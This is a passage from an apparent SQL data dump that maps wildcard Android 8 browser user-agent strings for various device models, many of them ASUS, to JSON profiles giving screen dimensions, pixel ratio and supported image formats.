Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ALIGATOR S6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ALP-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ALP-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ALP-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AM412) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ANE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ANE-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ANE-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ANE-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ANE-LX2J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ANE-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; APOLLO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ARE-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ARE-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ARE-L22HN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ARS-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ARS-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AS260) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASTRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_A001D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_A006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_A009) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X008D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00DD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00DDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00DDB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00DS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00ID) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00IS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00LD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00LDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00PD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00PS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00QD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00QDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00QSA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00RD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00TD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X00TDB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X018D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X01AD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_X01BDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z012D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z012DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z012DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z012DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z012DE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z012S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z016D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z016S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z017D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z017DA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z017DB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z017DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01GD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01GS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01HDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01KD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01KDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01KS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01QD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ASUS_Z01RD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ATU-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ATU-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ATU-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ATU-L31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ATU-L42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ATU-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AUM-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AUM-AL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AUM-L29) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AUM-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AUM-L33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AUM-L41) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AUM-L41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AWM501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX1017) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX1073+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX1076+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX1077) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX1077+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 